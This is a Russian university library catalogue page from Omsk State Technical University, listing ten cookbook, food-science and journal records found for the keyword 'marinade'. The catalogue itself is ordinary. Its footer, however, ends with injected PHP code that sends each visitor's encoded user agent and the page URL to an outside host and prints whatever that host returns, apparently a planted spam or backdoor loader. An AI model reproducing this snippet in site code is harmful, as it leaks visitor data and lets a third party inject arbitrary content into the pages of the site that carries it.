Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

138 пользователей


Зарегистрированных: 3 

Борисенко Виктория Александровна

Лисина Марина Михайловна

Медведева Юлия Сергеевна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=МАРИНАД")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 10
1. 
Товароведение и экспертиза продовольственных товаров [Текст] / В. И. Криштафович [и др.] ; ред. В. И. Криштафович, 2010. - 588 с.
Держатели документа (Информация об экземплярах) 

В лабораторном практикуме изложены методические указания по проведению экспертиз и оценке качества различных групп продовольственных товаров. Указаны материальное обеспечение каждой работы, подробные методики проведения исследований качества продовольственных товаров по органолептическим и физико-химическим показателям, приведены ситуационные задачи.

Для студентов высших учебных заведений.

2. 
Кулинария [Текст] / П. В. Абатуров [и др.] ; дар. В. С. Михайленко, 1955. - 959, [1] с.
Держатели документа (Информация об экземплярах) 
3. 
Авроров, Валерий Александрович. Традиционные народные технологии приготовления пищи из натуральных продуктов [Текст] / В. А. Авроров, Н. В. Моряхина, Н. Д. Тутов, 2017. - 287 с.
Держатели документа (Информация об экземплярах) 

Приведены рецепты различных скоромных и постных блюд, холодных и горячих закусок, салатов, саусов, маринадов, напитков, выпечки, сладких блюд, пасхи, мороженого и др., приготовляемых в домашних условиях.

Даны рекомендации по достижению вкусовых качеств блюд.

Предлагаемые рецепты блюд были хорошо известны в свое время, а некоторые из них и сегодня используются на предприятиях общественного питания.

Для всех приведенных рецептов характерно использование только натурального и высококачественного растительного и животного пищевого сырья и полуфабрикатов.

Учебное пособие предназначено для студентов вузов, обучающихся по направлениям "Технология продукции и организация общественного питания", "Продукты питания из растительного сырья".

4. 
Пищевая промышленность. - Журнал, 2004г. № 6
Оглавление 
  • Сизенко, Е. И. Проблемы хранения продукции АПК / Е. И. Сизенко. - с.9-11
    Кл. слова: ХРАНЕНИЕ ПРОДУКТОВ АПК
  • Кайшев, В. Г. Плодоовощная промышленность России в 1999-2003 гг. / В. Г. Кайшев, В. М. Черкасова. - с.12-16
    Кл. слова: ПРОМЫШЛЕННОСТЬ ПЛОДООВОЩНАЯ
  • Пенто, В. Б. Технология производства продукта промежуточной влажности из картофеля / В. Б. Пенто, О. А. Клюева. - с.18-19
    Кл. слова: Картофель - полуфабрикаты
  • Производство плодово-ягодных маринадов с использованием растительного сырья Западной Сибири / ; О. В. Голуб, В. М. Поздняковский, И. Н. Ковалевская, С. Б. Васильева. - с.20-21
    Кл. слова: Маринад плодово-ягодный
  • Троян, З. А. Высокотемпературная стерилизация в потоке соков с мякотью / З. А. Троян, Л. В. Михайлюта, Н. Н. Корастилева. - с.22-23
  • Термоустойчивость спор Cl. botulinum при стерилизации овощных закусочных консервов / ; Л. А. Русланова, Л. В. Михайлюта, Н. С. Коробкина, С. С. Чуприна. - с.23
  • Магомедов, Р. К. Продление сроков хранения перца сладкого / Р. К. Магомедов, F. Adamicki. - с.24-25
    Кл. слова: Перец сладкий - хранение
  • Минаева, Е. В. Проблемы активизации государственной политики протекционизма отечественных товаропроизводителей зерна / Е. В. Минаева. - с.26-27
  • рябова, Т. Ф. Воздействие рисков хозяйственно-экономической деятельности на эффективность предприятий / Т. Ф. рябова, Моурик С. В. Ван. - с.28-29
    Кл. слова: Теория риска
  • Болдычева, А. Г. Определение стратегии экономического развития предприятия / А. Г. Болдычева, Т. М. Панченко. - с.3032
    Кл. слова: СТРАТЕГИЯ ПРЕДПРИЯТИЯ
  • Карданова, Л. И. Мониторинг потребительских предпочтений как элемент стратегического планирования / Л. И. Карданова, М. С. Боборенко. - с.34-36, ПРОДУКТЫ МОЛОЧНЫЕ - маркетинг
  • Магомедов, М. Д. Рынок мясных полуфабрикатов и проблемы его развития / М. Д. Магомедов, О. В. Милюкова. - с.37
    Кл. слова: Рынок полуфабрикатов мясных, ПОЛУФАБРИКАТЫ мясные
  • Бегучев, Н. И. Проблемы налогообложения малых предприятий / Н. И. Бегучев, С. В. Горин, С. Э. Курбанов. - с.38-40
    Кл. слова: ПРЕДПРИЯТИЕ МАЛОЕ - налоги, НАЛОГООБЛОЖЕНИЕ ПРЕДПРИЯТИЯ
  • Сервер промышленных приложений Wonderware Production Engine. - с.41-44
  • Климова, Д. В. Информационные системы управления на предприятиях АПК / Д. В. Климова. - с.46
    Кл. слова: АПК - информатизация
  • Крутикова, Е. О специальных защитных, антидемпинговых и компенсационных мерах при импорте товаров / Е. Крутикова, Ю. Боровикова. - с.47-49
  • Тужилкин, В. И. Предлагаем программы профессиональной переподготовки / В. И. Тужилкин, В. С. Сергунов. - с.50-52
  • Голубев, С. А. Метод начала "с нуля" в форме бюджетирования / С. А. Голубев, Е. В. Козин, Т. А. Козина. - с.53-55
  • Жапаров, К. Ж. Продовольственная безопасность Республики Казахстан / К. Ж. Жапаров, В. К. Чашин. - с.56-57
    Кл. слова: БЕЗОПАСНОСТЬ ПРОДОВОЛЬСТВЕНН
  • Нечаев, А. П. Союз производителей пищевых ингредиентов / А. П. Нечаев. - с.58-59
  • Тулякова, Т. В. Дрожжевые экстракты - безопасные источники витаминов, минеральных веществ и аминокислот / Т. В. Тулякова, А. В. Пасхин, В. Ю. Седов. - с.60-62
    Кл. слова: ЭКСТРАКТ дрожжевой
  • Каргопольцев, В. П. Защита электродвигателей промышленного назначения / В. П. Каргопольцев. - с.63
  • Щеглов, А. Ю. Новинки "МОЛМАША" / А. Ю. Щеглов, В. П. Карцев. - с.64
  • Бегларян, А. Р. Влияние магнитного поля на антогонистические свойства молочнокислых и бифидобактерий / А. Р. Бегларян, Р. А. Баклачян, Н. Р. Бегларян. - с.66
  • Совершенствование теплоустановок / ; Л. Л. Товажнянский, П. А. Капустенко, С. И. Бухкало, Г. Л. Халвин, А. В. Демирский. - с.68
  • Тулик, Ю. И. Экономичная система расходования водяного пара / Ю. И. Тулик. - с.69
  • Сухих, Т. Н. Новое время - новые кондитерские изделия / Т. Н. Сухих. - с.84
    Кл. слова: ИЗДЕЛИЯ КОНДИТЕРСКИЕ
  • Бекалюк, А. Е. "Вторую жизнь" безалкогольным напиткам / А. Е. Бекалюк. - с.86
  • Нарушин, В. Г. Бета-каротин из плесени / В. Г. Нарушин. - с.87
  • Самофалова, Л. А. Эмульсии растительного молока для производства мороженого / Л. А. Самофалова, А. П. Симоненкова. - с.88-89
  • Мендельсон, Г. И. Значение соевых белковых продуктов в питании человека / Г. И. Мендельсон. - с.90-91
    Кл. слова: СОЯ - питание
  • Филлипова, Л. Ю. Продукты питания лечебно-профилактического назначения для детей / Л. Ю. Филлипова, Л. П. Сергеева. - с.92
    Кл. слова: ПИТАНИЕ ДЕТЕЙ лечебное
  • Шатнюк, Л. Н. Обогащение микронутриентами пищевых концентратов на зерновой основе / Л. Н. Шатнюк, А. В. Юдина. - с.94-97
  • Комбинированные продукты питания функционального назначения с белково-жировыми композитами / ; Е. И. Титов, С. К. Апраксина, Л. Ф. Митасева. - с.98-99
  • Пилат, Т. Л. Производственные группы БАД / Т. Л. Пилат. - с.100-101
    Кл. слова: ДОБАВКА БИОЛОГИЧЕСКИ АКТИВНА
Держатели документа (Информация об экземплярах) 
5. 
Кулинарные рецепты: Из "Книги о вкусной и здоровой пище" [Текст] / сост. Л. И. Воробьева ; дар.: Л. К. Жарина, Л. К. Жарина, 1988. - 334, [1] с.
Ключевые слова 
ЗАКУСКА -- БУТЕРБРОД -- САЛАТ -- ИКРА -- ПАШТЕТ -- СОУС -- МАЙОНЕЗ -- БУЛЬОН -- СУП -- ОКРОШКА -- МЯСО -- КОТЛЕТА -- ТЕФТЕЛИ -- ШНИЦЕЛЬ -- ПЕЛЬМЕНИ -- КУРИЦА -- ДИЧЬ -- РЫБА -- МОРЕПРОДУКТ -- ТВОРОЖНИКИ -- ВАРЕНИК -- БЛИНЧИКИ -- ЗАПЕКАНКА -- ПУДИНГ -- ОМЛЕТ -- ОВОЩИ -- ГРИБЫ -- КАРТОФЕЛЬ -- ФОРШМАК -- КАША -- ПЛОВ -- КЛЕЦКИ -- ЧЕБУРЕК -- КУКУРУЗА -- ФАСОЛЬ -- ГОРОХ -- ЧЕЧЕВИЦА -- ПИРОЖОК -- ВАТРУШКА -- БУЛКА -- ОЛАДЬИ -- РУЛЕТ -- ПИРОЖНОЕ -- ТОРТ -- КЕКС -- ПОНЧИК -- ХВОРОСТ -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- МУСС -- КРЕМ -- ПУДИНГ -- ШАРЛОТКА -- МАРИНАД -- СОЛЕНЬЕ -- МАРИНАД -- КОНСЕРВИРОВАНИЕ -- ЗАМОРАЖИВАНИЕ -- ЯГОДЫ
Держатели документа (Информация об экземплярах) 
6. 
Кулинарные рецепты [Текст] / сост. Л. И. Воробьева, 1983. - 835 с.
Ключевые слова 
БУТЕРБРОД -- САЛАТ -- ВИНЕГРЕТ -- ЗАКУСКА ХОЛОДНАЯ -- ЗАКУСКА ОВОЩНАЯ -- ЗАКУСКА ИЗ ЯИЦ -- СОУС -- ЗАКУСКА ГОРЯЧАЯ -- БУЛЬОН -- СУП -- СУП - ПЮРЕ -- СУП ХОЛОДНЫЙ -- МЯСО ОТВАРНОЕ -- МЯСО ТУШЕНОЕ -- МЯСО ЖАРЕНОЕ -- МЯСО РУБЛЕНОЕ -- МЯСО ЗАПЕЧЕННОЕ -- РЫБА ОТВАРНАЯ -- РЫБА ЖАРЕНАЯ -- РЫБА ТУШЕНАЯ -- БЛЮДА ИЗ МОРЕПРОДУКТОВ -- БЛЮДА МОЛОЧНЫЕ -- БЛЮДА ИЗ ЯИЦ -- ОМЛЕТ -- ОВОЩИ ОТВАРНЫЕ -- ОВОЩИ ЖАРЕНЫЕ -- ОВОЩИ ЗАПЕЧЕННЫЕ -- ОВОЩИ ТУШЕНЫЕ -- ОВОЩИ ФАРШИРОВАННЫЕ -- БЛЮДА ИЗ ГРИБОВ -- КАША -- ПЛОВ -- БЛЮДА ИЗ МАКАРОННЫХ ИЗДЕЛИЙ -- БЛЮДА ИЗ БОБОВЫХ -- ТЕСТО ДРОЖЖЕВОЕ -- ТЕСТО ПРЕСНОЕ -- ТЕСТО СЛОЕНОЕ -- БЛИНЫ -- ОЛАДЬИ -- БУЛОЧКИ -- КУЛИЧИ -- ПЕЧЕНЬЕ -- ПИРОЖНЫЕ -- ТОРТ -- КЕКС -- КИСЕЛЬ -- КОМПОТ -- ЖЕЛЕ -- КРЕМ -- ПУДИНГ -- КОНСЕРВИРОВАНИЕ ДОМАШНЕЕ -- МАРИНАД -- ЗАМОРАЖИВАНИЕ ОВОЩЕЙ -- ЗАМОРАЖИВАНИЕ ПЛОДОВ
Держатели документа (Информация об экземплярах) 
7. 
Гаевская Л. Я. Украинская кухня [Текст] : издания для досуга / Л. Я. Гаевская, 2004. - 159 с.
Держатели документа (Информация об экземплярах) 
8. 
Русская кулинария [Текст] / сост. Е. Перлова, 1997. - 130 с.
Держатели документа (Информация об экземплярах) 
9. 
Русский гриль [Текст], 1995. - 143 с.
Держатели документа (Информация об экземплярах) 
10. 
Глебова, Екатерина Ильинична. Ягодный сад [Текст] / Е. И. Глебова, В. В. Даньков, М. М. Скрипниченко, 1990. - 206, [2] с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3021 - 17.09.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.18 с.14 запросов, 0.95c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;